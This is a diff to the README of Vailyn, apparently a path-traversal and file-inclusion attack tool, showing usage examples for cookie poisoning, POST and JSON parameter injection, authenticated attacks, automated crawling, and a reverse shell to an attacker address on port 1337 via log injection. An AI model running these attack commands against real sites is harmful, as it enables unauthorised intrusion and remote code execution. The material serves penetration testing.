VainlyStrain/Vailyn/README.md

 `$ Vailyn -v "http://site.com/cookiemonster.php" -a 3 -p2 leak dicts/files dicts/dirs`
 Will fetch cookies and you can select cookie you want to poison

-* POST Attack:
+* POST Plain Attack:
 `$ Vailyn -v "http://site.com/download.php" -a 4 -p2 leak dicts/files dicts/dirs -p "DATA1=xx&DATA2=INJECT"`
 will infect DATA2 with the payload

+* POST JSON Attack:
+`$ Vailyn -v "http://site.com/download.php" -a 5 -p2 leak dicts/files dicts/dirs -p '{"file": "INJECT"}'`

 * Attack, but target is behind login screen:
 `$ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c "sessionid=foobar"`

 * Attack, but I want a reverse shell on port 1337:
-`$ Vailyn -v "http://site.com/download.php" -a 1 -p2 rce MY.IP.IS.XX 1337  # a high Phase 2 Depth would be beneficial`
+`$ Vailyn -v "http://site.com/download.php" -a 1 -p2 rce MY.IP.IS.XX 1337  # a high Phase 2 Depth is needed for log injection`
 (will start a ncat listener for you if on Unix)

 * Full automation in crawler mode:
-`$ Vailyn -v "http://root-url.site" -a 5` _you can also specify other args, like cookie, depths, lfi & lookup file here_
+`$ Vailyn -v "http://root-url.site" -a A` _you can also specify other args, like cookie, depths, lfi & lookup file here_

 * Full automation, but Arjun needs `--stable`:
-`$ Vailyn -v "http://root-url.site" -a 5 -s ANY`
+`$ Vailyn -v "http://root-url.site" -a A -s ANY`

 ### Demo